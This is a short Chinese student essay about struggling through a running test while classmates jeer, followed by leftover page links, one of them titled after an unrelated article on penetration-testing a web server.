就在我经过单双杠的时候,同学们对我说:“跑得太慢啦!你怎么可能就这点速度!!再跑快一点!!不然砸死你!!”同学们啊!我是想跑的快一点啊!可是我的喉咙好痛,脚都跑软了啦!我心想到。但是我依然奋力地向前冲,可是,到了最后的时候,居然又有一个要死的人超过了我!!死气我也!!
唉,经过这次测试,我这才知道,原来我的身体是这么的不行啊!!还得再好好练练啊!
【记一次完整的WEB服务器渗透测试】相关文章:
1.渗透测试的介绍






文档为doc格式